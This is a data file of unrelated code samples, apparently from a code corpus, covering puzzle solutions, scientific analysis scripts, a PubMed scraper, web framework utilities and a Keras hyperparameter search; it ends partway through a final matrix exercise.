+{"seq_id":"287432480","text":"# coding=utf-8\r\n\"\"\"\r\n20. Valid Parentheses My Submissions Question\r\nGiven a string containing just the characters '(', ')', '{', '}', '[' and ']', determine if the input string is valid.\r\n\r\nThe brackets must close in the correct order, \"()\" and \"()[]{}\" and \"([()])\" are all valid but \"(]\" and \"([)]\" are not.\r\n\r\nSubscribe to see which companies asked this question\r\n\r\n\"\"\"\r\n\r\n\r\nclass StackItem(object):\r\n def __init__(self, x):\r\n self.val = x\r\n self.next = None\r\n\r\n\r\nclass Solution(object):\r\n def isValid(self, s):\r\n \"\"\"\r\n :type s: str\r\n :rtype: bool\r\n \"\"\"\r\n if not s or len(s) == 0 or len(s) % 2 != 0:\r\n return False\r\n parentheses_dict = {\"(\": \")\",\r\n \")\": \"(\",\r\n \"]\": \"[\",\r\n \"}\": \"{\",\r\n \"[\": \"]\",\r\n \"{\": \"}\"\r\n }\r\n head = None\r\n for i in range(len(s)):\r\n # 栈是空的,说明前面的都匹配\r\n if not head:\r\n head = StackItem(s[i])\r\n\r\n # 栈不空,有新的匹配后,出栈\r\n elif parentheses_dict[head.val] == s[i]:\r\n if head.next:\r\n head = head.next\r\n else:\r\n head = None\r\n # 栈不空,没有匹配,压入栈\r\n else:\r\n new_head = StackItem(s[i])\r\n new_head.next = head\r\n head = new_head\r\n if head:\r\n return False\r\n return True\r\n\r\n\r\nif __name__ == '__main__':\r\n print (Solution().isValid(\"([)]\"))\r\n","sub_path":"zishell/solution/easy/solution20_Valid Parentheses.py","file_name":"solution20_Valid Parentheses.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"73398995","text":"from marionette_harness import MarionetteTestCase\nimport testsuite\n\nclass Test(MarionetteTestCase):\n def test_useragent(self):\n with self.marionette.using_context('content'):\n self.marionette.navigate('about:robots')\n js = self.marionette.execute_script\n # Check that useragent string is as expected\n # We better know the ESR version we're testing\n osname = testsuite.TestSuite().t['tbbinfos']['os']\n if osname == 'Linux':\n ua_os = 'X11; Linux x86_64'\n if osname == 'Windows':\n ua_os = 'Windows NT 6.1; Win64; x64'\n if osname == 'MacOSX':\n ua_os = 'Macintosh; Intel Mac OS X 10.13'\n ua_ver = '91.0'\n self.assertEqual(\"Mozilla/5.0 (\" + ua_os + \"; rv:\" + ua_ver + \") Gecko/20100101 Firefox/\" + ua_ver,\n js(\"return navigator.userAgent\"))\n","sub_path":"marionette/tor_browser_tests/test_fp_useragent.py","file_name":"test_fp_useragent.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"209601395","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# %% import\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport anatools as ana\nfrom scipy.ndimage.filters import gaussian_filter\nfrom h5py import File\nfrom yaml import load as load_yaml\nfrom glob import glob\nfrom os.path import splitext\nfrom scipy.optimize import fmin\nfrom numba import jit\n\n# %% read data file\n# config\nconfig = load_yaml(\"\"\"\n---\nimg_filename: /Users/daehyun/Documents/Sources/fermi-vmi-tmp/test/img.npy\nimg_key:\ngauss_blur: 3\n\"\"\")\nfilename = config['img_filename']\nkey = config['img_key']\nblur = config['gauss_blur']\n\n# do\n__fn, *_ = glob(filename)\n_, __ext = splitext(__fn)\nif '.npy' == __ext:\n img = np.load(__fn)\nif '.h5' == __ext:\n with File(*glob(filename), 'r') as f:\n img = f[key][...]\norigin = ana.Hist(gaussian_filter(img, blur).T) # shape=(x,z)\n\nplt.figure(figsize=(8, 
8))\nplt.pcolormesh(origin.hist.T)\nplt.show()\n\n\n# %%\n@jit\ndef entropy(dist):\n mask = dist <= 0\n normalized = dist[~mask]/dist[~mask].sum()\n return (-normalized*np.log2(normalized)).sum()\n\n# %% sampling data and optimize parameters\n# config\nconfig = load_yaml(\"\"\"\n---\ninit_params:\n k: 0.9963008816567109\n th: 0.4298510328659137\n x0: 426.5012296723083\n y0: 485.09432064781976\nr_bins: [100, 300, 500]\nth_bins: [-3.141592653589793, 3.141592653589793, 500]\n\"\"\")\n__opt = config['init_params']\nopt = (__opt['k'], __opt['th'], __opt['x0'], __opt['y0'])\n*rlim, rbins = config['r_bins']\n*thlim, thbins = config['th_bins']\n\n# do\npolarized = ana.Hist( # shape=(r,th)\n None,\n np.linspace(*rlim, num=rbins+1),\n np.linspace(*thlim, num=thbins+1))\noptimized = polarized.copy\n\n# sample data\n_, inverter = ana.SqueezeTransformer(*opt).operators # f(x,z)\npolarized.intensity = ana.convert_df_xy2rth( # f(x,z)->g(x,z)->g(z,x)->h(r,th)\n lambda z, x: origin.intensity(*inverter(x, z)))\nth_smp = polarized.y_centers\nr_smp = np.array(tuple(\n polarized.x_centers[w.argmax()] for w in polarized.hist.T))\n\n# subplot(311)\nplt.figure(figsize=(8, 8))\nplt.subplot(211)\nplt.pcolormesh(*polarized.meshed_yxz)\nplt.plot(th_smp, r_smp, '*w')\nplt.xlim(thlim)\n\n\n# %%\ndef __f(opt):\n transformer, inverter = ana.SqueezeTransformer(*opt).operators # f(x,z)\n optimized.intensity = ana.convert_df_xy2rth(\n # f(x,z)->g(x,z)->g(z,x)->h(r,th)\n lambda z, x: origin.intensity(*inverter(x, z)))\n return entropy(optimized.hist.sum(0))+entropy(optimized.hist.sum(1))\nopt = fmin(__f, opt)\n\n\n# %%\n# optimize parameters\ntransformer, inverter = ana.SqueezeTransformer(*opt).operators # f(x,z)\noptimized.intensity = ana.convert_df_xy2rth( # f(x,z)->g(x,z)->g(z,x)->h(r,th)\n lambda z, x: origin.intensity(*inverter(x, z)))\nth = optimized.y_centers\ndist = optimized.hist.sum(0)\n\n# subplot(312)\nplt.subplot(212)\nplt.pcolormesh(*optimized.meshed_yxz)\nplt.xlim(thlim)\n\n# %%\n# SET PARAMETERS FOR INVERSION\nconfig = load_yaml(\"\"\"\n---\nlinear_opt:\n k: 0.9942\n th: 0.15837699280148068\n x0: 426.2\n y0: 484.8\nlegendre_nlim: 10\nz_bins: [-500, 500, 1000]\nr_bins: [0, 500, 2000]\nth_bins: [-3.141592653589793, 3.141592653589793, 360]\n\"\"\")\n#opt = config['linear_opt']\nnlim = config['legendre_nlim']\n*zlim, zbins = config['z_bins']\n*rlim, rbins = config['r_bins']\n*thlim, thbins = config['th_bins']\n\n# symmetric inversion\n# inverse data symmetric\nz_edges = np.linspace(*zlim, num=zbins+1)\noptimized = ana.Hist(None, z_edges, z_edges) # shape=(x,z)\nreconstructed = optimized.copy # shape=(r,z)\ntransformer, inverter = ana.SqueezeTransformer(*opt).operators\noptimized.intensity = lambda x, z: origin.intensity(*inverter(x, z))\nreconstructed.hist = ana.abel_inverse( # shape=(r,z)\n optimized.hist, optimized.x_edges)\n\n# legendre transformation\n# finite-legendre-transform\nr_edges = np.linspace(*rlim, num=rbins+1)\nth_edges = np.linspace(*thlim, num=thbins+1)\npolarized = ana.Hist(None, r_edges, th_edges) # shape=(r,th)\ninverted = polarized.copy\nweighted = polarized.copy\npolarized.intensity = ana.convert_df_xy2rth(\n lambda z, r: reconstructed.intensity(r, z))\ncoeff_neg, coeff_pos, basis = ana.finite_legendre_transform_in_theta(\n polarized.hist.T, polarized.y_edges, nlim+1) # shapes=(n,r)(n,th)\ncoeff_avg = (coeff_neg + coeff_pos)/2\n\n# %%\n# CALCULATE BETAS AND PLOT\nconfig = load_yaml(\"\"\"\n---\nsides: [left, right]\nbetas: [1, 2]\nrlim: [null] # null for auto-set\nylim: [null] # null for 
auto-set\nreturns:\n reg1: [152, 162]\n reg2: [440, 450]\n\"\"\")\nsides = config['sides']\nbetas = config['betas']\nrlim = config['rlim']\nylim = config['ylim']\nrets = config['returns']\n\n# plot\nplt.figure(figsize=(12, 8))\nax_left = plt.gca()\nplt.twinx()\nax_rght = plt.gca()\nfor side, coeff in (\n ('left', coeff_neg),\n ('right', coeff_pos),\n ('avg', coeff_avg),\n ):\n if not side in sides:\n continue\n inverted.hist = coeff.T.dot(basis) # shape=(r,th)\n weighted.intensity = (\n lambda r, th:\n inverted.intensity(r, th)*np.abs(r*np.sin(th))*np.pi)\n\n plt.sca(ax_left)\n for i, beta in enumerate(coeff[1:]/coeff[0]):\n if not i+1 in betas: continue\n plt.plot(polarized.x_centers, beta,\n label='beta{} ({})'.format(i+1, side))\n plt.sca(ax_rght)\n plt.plot(weighted.x_centers, weighted.hist.sum(1),\n 'k', label='dist ({})'.format(side))\n\n for key in rets:\n rreg = rets[key]\n dist = weighted.hist.sum(1)\n r_mask = ana.get_mask(rreg)\n idx = r_mask(weighted.x_centers)\n print('{} ({:5s}): {}--{}'.format(key, side, *rreg))\n for i, beta in enumerate(coeff[1:]/coeff[0]):\n avg, std = ana.get_avg(beta[idx], weights=dist[idx])\n print(' beta{:2}: {:+6f} +-{:6f}'.format(\n i+1, avg, std))\n print('')\nplt.sca(ax_left)\nplt.xlabel('r (px)')\nplt.ylabel('beta (1)')\nplt.ylim(-1, 4)\nplt.legend(loc=2)\nplt.minorticks_on()\nplt.grid(which='both')\n\nplt.sca(ax_rght)\nplt.ylabel('intensity (arb unit)')\nplt.xlim(*rlim)\nplt.ylim(*ylim)\nplt.legend(loc=1)\nplt.show()\n\n# %%\nfb = 5.606e-6\ndef norm(arr):\n# return arr/arr.max()\n return arr\n# return arr/arr[590:700].sum()\n\nplt.figure(figsize=(10,10))\nplt.plot(weighted.x_centers**2*fb*40, norm(dist659), label='659')\nplt.plot(weighted.x_centers**2*fb*40, norm(dist660), label='660')\n\n#plt.plot(weighted.x_centers**2*fb*7, norm(dist656on), label='on t0')\n#plt.plot(weighted.x_centers**2*fb*7, norm(dist656off), label='off t0')\n#plt.plot(weighted.x_centers**2*fb*7, norm(dist656on-dist656off), label='diff t0')\n#plt.plot(weighted.x_centers**2*fb*7, norm(dist657on), label='on t0+1ps')\n#plt.plot(weighted.x_centers**2*fb*7, norm(dist657off), label='off t0+1ps')\n#plt.plot(weighted.x_centers**2*fb*7, norm(dist657on-dist657off), label='diff t0+1ps')\n\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist650_655on_t0), label='on t0')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist650_655off_t0), label='off t0')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist650_655on_t0-dist650_655off_t0), label='diff t0')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist650_655on_1ps), label='on t0+1ps')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist650_655off_1ps), label='off t0+1ps')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist650_655on_1ps-dist650_655off_1ps), label='diff t0+1ps')\n\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist631_642on_t0), label='on t0')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist631_642off_t0), label='off t0')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist631_642on_t0-dist631_642off_t0), label='diff t0')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist631_642on_1ps), label='on t0+1ps')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist631_642off_1ps), label='off t0+1ps')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist631_642on_1ps-dist631_642off_1ps), label='diff t0+1ps')\n\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist643_649on_t0), label='on t0')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist643_649off_t0), label='off t0')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist643_649on_t0-dist643_649off_t0), 
label='diff t0')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist643_649on_1ps), label='on t0+1ps')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist643_649off_1ps), label='off t0+1ps')\n#plt.plot(weighted.x_centers**2*fb*40, norm(dist643_649on_1ps-dist643_649off_1ps), label='diff t0+1ps')\nplt.legend()\nplt.grid()\n#plt.xlim(0,10)\n#plt.ylim(0,2000)","sub_path":"SACLA 2017A8005/opt_pars_using_entropy.py","file_name":"opt_pars_using_entropy.py","file_ext":"py","file_size_in_byte":8442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"187792527","text":"fact_dict = {}\ndef fact(n):\n    if n not in fact_dict.keys():\n        if n==1 or n==0:\n            fact_dict[n] = 1\n        else:\n            fact_dict[n] = n * fact(n-1)\n    return fact_dict[n]\n\n\n\ndef get_result():\n    total = 0\n    mystr = str(fact(100))\n    for elem in mystr:\n        total += int(elem)\n    return total  # sum of the digits of 100!\n\nif __name__ == '__main__':\n    import timeit\n    # divide inside print(): print() returns None, so dividing its result would raise a TypeError\n    print(timeit.timeit(\"get_result()\", setup=\"from __main__ import get_result\", number=10000) / 10000)\n\n","sub_path":"pb20.py","file_name":"pb20.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"165697297","text":"def main():\n    a = input(\"enter a number=\")\n    try:\n        x = int(a) % 2\n        if x == 0:\n            print(a + \" is even\")\n        else:\n            print(a + \" is odd\")\n    except:\n        print(\"invalid entry\")\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"Batly Programmed/even-or-odd.py","file_name":"even-or-odd.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"447302881","text":"import unittest\n\nfrom brittle_wit.helpers import *\n\n\nclass TestHelpers(unittest.TestCase):\n\n    def test_parse_date(self):\n        s = \"Tue Mar 29 15:40:03 +0000 2016\"\n        self.assertEqual(parse_date(s).timestamp(), 1459266003.0)\n\n    def test_wrapping_handler(self):\n        messages = []\n\n        handler = WrappingHandler(lambda msg: messages.append(msg))\n        handler.send(\"hello.\")\n        handler.send(\"it's me.\")\n\n        self.assertEqual(\" \".join(messages), \"hello. 
it's me.\")\n","sub_path":"test/test_helpers.py","file_name":"test_helpers.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"10856934","text":"import cdms2\nimport os,sys\n\nf=cdms2.open(os.path.join(sys.prefix,\"sample_data\",\"clt.nc\"))\n\ns=f(\"clt\",slice(0,1))\n\ng=cdms2.createGaussianGrid(64)\ngl = cdms2.createZonalGrid(g)\nregridded = s.regrid(gl)\n","sub_path":"testing/cdms2/test_regrid_zonal_switch_to_regrid2.py","file_name":"test_regrid_zonal_switch_to_regrid2.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"580012799","text":"if __name__ == '__main__':\n    n = int(input())\n    student_marks = {}\n    for i in range(n):\n        stroka = input()\n        splitter = stroka.split(\" \")\n        imya = splitter[0]\n        n1=float(splitter[1])\n        n2=float(splitter[2])\n        n3=float(splitter[3])\n        n_avg=(n1+n2+n3)/3.0\n        student_marks[imya]=\"%.2f\" % n_avg\n    s_name=input()\n    print(student_marks[s_name])\n","sub_path":"week10/Hackerrank/findingthepercentage.py","file_name":"findingthepercentage.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"342064223","text":"###\n###\n###\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport wx\nimport os\nimport os.path\nimport sys\nimport numpy as np\nfrom itertools import chain  # needed by chain.from_iterable below\n\nclass wxDisconnect3D():\n\n    # ----------------------------------------------------------------------\n\n    def Execute2_3Disconnect(self, event):\n        if not self.UserInfo.mojo_files_found:\n            print('Dojo files have not been validated.')\n            print('Select Dojo files folder.')\n            return False\n        print('Create ID tables for 3D disconnect..')\n\n        ncol = self.grid2.GetNumberCols()\n        nrow = self.grid2.GetNumberRows()\n        DisconnectIDs = []\n        for col in range(ncol):\n            TargetColVals = [self.grid2.GetCellValue(row, col).encode(\"UTF-8\") for row in range(nrow)]\n            TargetColVals = [i for i in TargetColVals if i != '']  # equality, not identity\n            TargetColVals = [int(i) for i in TargetColVals]\n            if TargetColVals != []:\n                DisconnectIDs.append(np.array(TargetColVals, dtype='uint32'))\n        print(DisconnectIDs)\n\n        #\n        if DisconnectIDs == []:\n            print('No ID is specified.')\n            return False\n        #\n        tmp1 = list(chain.from_iterable(DisconnectIDs))\n        tmp2 = list(set(tmp1))\n        if len(tmp1) != len(tmp2):\n            print('Each ID can appear only once.')\n            return False\n        #\n        Disconnect3D.main(DisconnectIDs, self.UserInfo)\n\n    # ----------------------------------------------------------------------\n    # I want to move the AppendRowsCols2 to wxDialog.py\n    # ----------------------------------------------------------------------\n\n\n    def AppendRowsCols2(self, event): # wxGlade: MojoControlPanel.\n        if not hasattr(self, \"popupID21\"):  # create the popup menu id only once\n            self.popupID21 = wx.NewId()\n            self.Bind(wx.EVT_MENU, self.OnPopupOne21, id=self.popupID21)\n        menu = wx.Menu()\n        menu.Append(self.popupID21, \"Add Row\")\n        self.PopupMenu(menu)  ###\n        menu.Destroy()\n\n    def OnPopupOne21(self, event):\n        self.grid2.AppendRows(1)\n    # ----------------------------------------------------------------------\n\n    # NOTE: this definition shadows the Execute2_3Disconnect defined above;\n    # only this one is bound at runtime.\n    def Execute2_3Disconnect(self, event): # wxGlade: MojoControlPanel.\n        wxDialogs.Execute3DDisconnector(self, event)\n\n    def Clear2_3Disconnect(self, event): # wxGlade: MojoControlPanel.\n        
self.grid2.ClearGrid()\n\n","sub_path":"wxMain/wxDisconnect3D.py","file_name":"wxDisconnect3D.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"384447453","text":"# Test edit\n# Erick Lu\n# pubmed_extractor.py\n\n# SAMPLE SEARCH FUNCTION:\n\n\"\"\"\nhttps://eutils.ncbi.nlm.nih.gov/entrez/eutils/esearch.fcgi?db=pubmed&term=cancer&usehistory=y&retmin=0&retmax=500\n\"\"\"\n\n# SAMPLE FETCH FUNCTION:\n\n'''\nhttp://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pubmed&WebEnv=NCID_1_196289963_130.14.18.34_9001_1524513200_1515294449_0MetA0_S_MegaStore&query_key=1&retmode=json&rettype=abstract\n'''\n\n# Import the necessary packages.\nimport csv\nimport re\nimport urllib\nimport os\nfrom time import sleep\n\n\n# Gather all the terms that you want to search Pubmed for.\nterms = [\"cancer\"]\n\nnumfailed = 0\nfor item in terms:\n    \n    # Create the csv file that will hold the categorized abstracts.\n    \n    # myfile = open ( str(item) + \" abstracts.csv\", 'wb')\n    # master_file = csv.writer(myfile, delimiter = ',')\n    datefile = open ('cancerabstracts.txt', 'w')\n    # errorfile = open(\"error2.txt\", 'w')\n    # Write the names for each column in the CSV file.\n    # master_file.writerow([\"Journal\", \"Title\", \"Authors\", \"Organization\", \"Abstract\", \"PMID\" ])\n    \n    # The set of static variables needed for the ESearch function:\n    baseURL = 'http://eutils.ncbi.nlm.nih.gov/entrez/eutils/'\n    eutil = 'esearch.fcgi?'\n    dbParam = 'db=pubmed'\n    usehistoryParam = '&usehistory=y'\n    rettype = '&rettype=json'\n    eutilfetch = 'efetch.fcgi?'\n    \n\n    termParam = '&term='+ str(item)\n    retmax = 500\n    retstart = 0\n    run = True\n    while run:\n\n        #Print the URL to check in terminal in case of error.\n        print (baseURL+eutil+dbParam+termParam+usehistoryParam)\n\n\n        #Open the webpage that will run the ESearch Function.\n\n        f = urllib.urlopen (baseURL+eutil+dbParam+termParam+usehistoryParam+rettype)\n        data = f.read().decode('utf-8')\n\n        #Print the search to the terminal (debugging purposes)\n        print (data)\n\n        #Extract the WebEnv and querykey (tracking the search), and count (for iteration).\n        #The XML tag names in these regexes are reconstructed from the standard\n        #NCBI ESearch response, which the surrounding comments describe.\n        webenv = \"&WebEnv=\" + re.findall (\"<WebEnv>(\\\\S+)<\\\\/WebEnv>\", data)[0]\n        count = int(re.findall(\"<Count>(\\\\d+?)</Count>\",data)[0])\n        querykey = \"&query_key=\" + re.findall(\"<QueryKey>(\\\\d+?)</QueryKey>\",data)[0]\n\n        #webenv = 'NCID_1_811107105_130.14.22.33_5555_1351061178_277739021'\n\n        #retrieve the data. Retmax = the number of abstracts returned. Retstart = \n        # the index at which retmax begins.\n\n\n        #Reset some parameters for the EFetch utility. Many of the parameters will be recycled from above.\n\n        rettype = \"&rettype=abstract\"\n        str_retmax = \"&retmax=\" + str(retmax)\n        retmode = \"&retmode=text\"\n        \n        \n        str_retstart = \"&retstart=\" + str(retstart)\n        fetch_url = baseURL+eutilfetch+dbParam+querykey+webenv+str_retstart+str_retmax+retmode+rettype\n\n        #Print the url for debugging purposes.\n        print (fetch_url)\n        \n        print (\"sleeping for 3 seconds\")\n        sleep(3)\n        \n\n        #To ensure the program runs to completion, use a try/except clause.\n        #The program will try to extract from the KB, and write to the csv file.\n        #If there is an error in the extraction, a non-halting error will be thrown\n        #containing the index at which the extraction error occured.\n        try:\n            #Open the webpage with the fetch utility.\n            fetch = urllib.urlopen (fetch_url)\n            failed = False\n            #Decode the data returned by the fetch command.\n            datam = fetch.read().decode('utf-8')\n            #print(datam)\n            #Strip off unnecessary text.\n            #chunk = datam[62:-20] \n\n            #Split the data into individual abstracts.\n            chunks = datam.split(\"[PubMed\")\n            if len(chunks) < 100:\n                print(str(retstart))\n                failed = True\n\n            \n            #print ((len(chunks)-4))\n            #For each abstract, split the individual abstract and write it to the CSV file,\n            #categorized by Journal, Title, Author, Organization, Abstract, and PMID.\n            for i in range(0, (len(chunks)-4)):\n                #To obtain categories, split every double newline.\n                splitchunk = chunks[i].split(\"\\\\n\\\\n\")[1:2]\n                #splitchunk = [f for f in splitchunk if f != \"\"]\n                \n\n                #Some of the abstracts returned either are incomplete or have no information.\n                #A full abstract will have all six categories.\n                #The abstracts that have less than 5 categories will be ignored because of \n                #insufficient information. \n                #The abstracts with only 5 categories have been found to be missing information\n                #on the organization from which they came from. I will add them to the CSV file\n                datefile.write(\" \".join(splitchunk))\n                datefile.write(\"\\\\n\")\n                \n                \n                # master_file.writerow(splitchunk)\n                #print(splitchunk)\n            if failed == True:\n                datefile.write(\"\\\\n Failed at \" + str(retstart) + \"\\\\n\\\\n\")\n            else:\n                datefile.write(\"\\\\n Success at \" + str(retstart) + \"\\\\n\\\\n\")\n\n        #The except clause explained above.\n        \n        except:\n            print (\"Error at retstart:\", retstart)\n            datefile.write(\"\\\\n Failed at \" + str(retstart) + \"\\\\n\")\n            numfailed = numfailed +1\n        #If the return index is higher than the total number of indexes, then break the loop and exit.\n        #break\n        if retstart > count:\n            break\n        #If it is not, then update retstart and perform the actions again.\n        retstart = retstart+retmax\n        print (\"sleeping for 3 seconds\")\n        sleep(3)\n        \n        \n    #NOTE: EFETCH automatically cuts off if retmax is over the total number of articles remaining. 
It will not error.\n datefile.close()\n #errorfile.close()\n\n \nprint (numfailed)\n\n\n\n\n\n\n\n\n","sub_path":"pubmed_extractor.py","file_name":"pubmed_extractor.py","file_ext":"py","file_size_in_byte":6972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"81924946","text":"#!/usr/bin/env python\nimport os\n\nCOV = None\nif os.environ.get(\"FLASK_COVERAGE\"):\n import coverage\n COV = coverage.coverage(branch=True, include='powertrain/*')\n COV.start()\n\nfrom powertrain import create_app, db\nfrom powertrain.models import DerivedBehavior, RawBehavior, Configuration,\\\n DerivedImage, RawImage, Job, ExecutionUnit, JobSetup, JobTeardown,\\\n MRSession, Project, Scan, Task, TaskSetup, TaskTeardown, User\nfrom flask.ext.script import Manager, Shell\nfrom flask.ext.migrate import Migrate, MigrateCommand\n\n\napp = create_app(os.getenv('FLASK_CONFIG') or 'default')\nmanager = Manager(app)\nmigrate = Migrate(app, db)\n\ndef make_shell_context():\n return dict(app=app,\n db=db,\n DerivedBehavior=DerivedBehavior,\n RawBehavior=RawBehavior,\n Configuration=Configuration,\n DerivedImage=DerivedImage,\n RawImage=RawImage,\n Job=Job,\n ExecutionUnit=ExecutionUnit,\n JobSetup=JobSetup,\n JobTeardown=JobTeardown,\n MRSession=MRSession,\n Project=Project,\n Scan=Scan,\n Task=Task,\n TaskSetup=TaskSetup,\n TaskTeardown=TaskTeardown,\n User=User)\n\nmanager.add_command(\"shell\", Shell(make_context=make_shell_context))\nmanager.add_command('db', MigrateCommand)\n\n\n@manager.command\ndef test(coverage=False):\n \"\"\"Run the unit tests.\"\"\"\n if coverage and not os.environ.get('FLASK_COVERAGE'):\n import sys\n os.environ['FLASK_COVERAGE'] = '1'\n os.execvp(sys.executable, [sys.executable] + sys.argv)\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=1).run(tests)\n if COV:\n COV.stop()\n COV.save()\n print(\"Coverage summary:\")\n COV.report()\n basedir = os.path.abspath(os.path.dirname(__file__))\n covdir = os.path.join(basedir, 'htmlcov')\n COV.html_report(directory=covdir)\n print(\"HTML version: file://{}/index.html\".format(covdir))\n COV.erase()\n\n\n\nif __name__ == '__main__':\n manager.run()\n","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"268788113","text":"from django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom plant_core.models import HeaterController\nfrom plant_core.serializers import HeaterSerializer\n\n\nclass HeaterView(GenericAPIView):\n serializer_class = HeaterSerializer\n\n @csrf_exempt\n def post(self, request):\n serializer = HeaterSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n try:\n power = HeaterController.objects.all()[0].power\n except IndexError:\n power = 0\n\n return Response(\n {\"type\": \"HeaterView\", \"acknowledged\": True, \"power\": power},\n status=status.HTTP_201_CREATED,\n )\n\n else:\n return Response(\n {\n \"type\": \"HeaterView\",\n \"error\": True,\n \"message\": \"Missing mandatory key(s) to process\",\n \"power\": 0,\n },\n status=status.HTTP_400_BAD_REQUEST,\n 
)\n","sub_path":"plant_core/views/heater.py","file_name":"heater.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"350638980","text":"# -*- coding: utf-8 -*-\r\n# pip install --upgrade --no-deps git+git://github.com/Theano/Theano.git\r\n\r\n# Installing Tensorflow\r\n# pip install tensorflow\r\n\r\n# Installing Keras\r\n# pip install --upgrade keras\r\n\r\n# Part 1 - Data Preprocessing\r\n\r\n# Importing the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Importing the dataset\r\ndataset = pd.read_csv('Churn_Modelling.csv')\r\nX = dataset.iloc[:, 3:13].values\r\ny = dataset.iloc[:, 13].values\r\n\r\n# Encoding categorical data\r\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\r\nlabelencoder_X_1 = LabelEncoder()\r\nX[:, 1] = labelencoder_X_1.fit_transform(X[:, 1])\r\nlabelencoder_X_2 = LabelEncoder()\r\nX[:, 2] = labelencoder_X_2.fit_transform(X[:, 2])\r\nonehotencoder = OneHotEncoder(categorical_features = [1])\r\nX = onehotencoder.fit_transform(X).toarray()\r\nX = X[:, 1:]\r\n\r\n# Splitting the dataset into the Training set and Test set\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, \r\n random_state = 0)\r\n\r\n# Feature Scaling\r\nfrom sklearn.preprocessing import StandardScaler\r\nsc = StandardScaler()\r\nX_train = sc.fit_transform(X_train)\r\nX_test = sc.transform(X_test)\r\n\r\n# Part 2 - Now let's make the ANN!\r\n\r\n# Importing the Keras libraries and packages\r\nimport keras\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\nfrom keras.layers import Dropout\r\n\r\n# Partie 4\r\n\r\n# Importing Module\r\nfrom keras.wrappers.scikit_learn import KerasClassifier\r\nfrom sklearn.model_selection import GridSearchCV\r\n\r\n# Fonction de construction\r\ndef build_classifier(optimizer):\r\n classifier = Sequential()\r\n classifier.add(Dense(units = 6, kernel_initializer = 'uniform', \r\n activation = 'relu', input_dim = 11))\r\n classifier.add(Dense(units = 6, kernel_initializer = 'uniform', \r\n activation = 'relu'))\r\n classifier.add(Dense(units = 1, kernel_initializer = 'uniform', \r\n activation = 'sigmoid'))\r\n classifier.compile(optimizer = optimizer, loss = 'binary_crossentropy', \r\n metrics = ['accuracy'])\r\n return classifier\r\n\r\n# K-fold cros validation\r\nclassifier = KerasClassifier(build_fn=build_classifier)\r\nparameters = {\"batch_size\": [25, 32],\r\n \"epochs\": [100,500],\r\n \"optimizer\": [\"adam\",\"rmsprop\"]}\r\ngrid_search = GridSearchCV(estimator=classifier,\r\n param_grid=parameters,\r\n scoring=\"accuracy\",\r\n cv=10)\r\ngrid_search = grid_search.fit(X_train, y_train)\r\n\r\n\r\nbest_parameters = grid_search.best_params_\r\nbest_precision = grid_search.best_score_\r\n\r\n\r\n\r\n","sub_path":"ReseauNeurone/dropout_Eviter_SurApprentisssage.py","file_name":"dropout_Eviter_SurApprentisssage.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"374526114","text":"matriz = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\nspar = mai = scol = 0\nfor l in range(0, 3):\n for c in range(0, 3):\n matriz[l][c] = 